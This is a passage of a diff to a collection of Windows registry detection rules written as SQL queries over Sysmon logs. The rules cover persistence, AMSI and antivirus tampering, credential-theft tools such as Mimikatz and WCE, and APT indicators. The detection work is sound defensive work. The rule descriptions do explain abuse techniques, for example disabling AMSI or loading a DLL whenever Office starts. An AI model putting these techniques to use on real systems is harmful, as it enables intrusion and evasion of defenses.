'%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_common.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "WinSock2 Autorun Keys Modification", - "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (Details = '(Empty)' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" + "filename": "registry_event_apt_oceanlotus_registry.yml" }, { - "title": "New Root or CA or AuthRoot Certificate to Store", - "id": "d223b46b-5621-4037-88fe-fda32eead684", - "status": "experimental", - "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", - "author": "frack113", + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "status": "test", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND Details = 'Binary Data')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_install_root_or_ca_certificat.yml" + "filename": "registry_event_mal_flowcloud.yml" }, { - "title": "IE Change Domain Zone", - "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", - "status": "experimental", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "Office Application Startup - Office Test", + "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "status": "test", + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", + "author": "omkar72", "tags": [ "attack.persistence", - "attack.t1137" + "attack.t1137.002" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" ], - "filename": "registry_set_change_security_zones.yml" + "filename": "registry_event_office_test_regadd.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", - "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", - "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "title": "Run Once Task Configuration in Registry", + "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "status": "test", - "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", - "author": "Sittikorn S", + "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1221" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate modification of the registry key by legitimate program" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((Details LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((Details LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" ], - "filename": "registry_set_cve_2022_30190_msdt_follina.yml" + "filename": "registry_event_runonce_persistence.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Path To Screensaver Binary Modified", + "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "status": "test", + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" ], "falsepositives": [ - "Unknown" + "Legitimate modification of screensaver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "registry_set_amsi_com_hijack.yml" + "filename": "registry_event_modify_screensaver_binary_path.yml" }, { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_xll.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "Disable Administrative Share Creation at Startup", - "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "status": "test", - "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", - "author": "frack113", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + ], + "filename": "registry_event_hack_wce_reg.yml" + }, + { + "title": "PortProxy Registry Key", + "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "status": "test", + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.lateral_movement", "attack.defense_evasion", - "attack.t1070.005" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" ], - "filename": "registry_set_disable_administrative_share.yml" + "filename": "registry_event_portproxy_registry_key.yml" }, { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", - "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "status": "test", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.execution", + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "New DLL Added to AppCertDlls Registry Key", + "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1546.009" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" ], - "filename": "registry_set_uac_bypass_wmp.yml" + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" }, { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_disable_macroruntimescanscope.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "author": "frack113", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "status": "test", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE 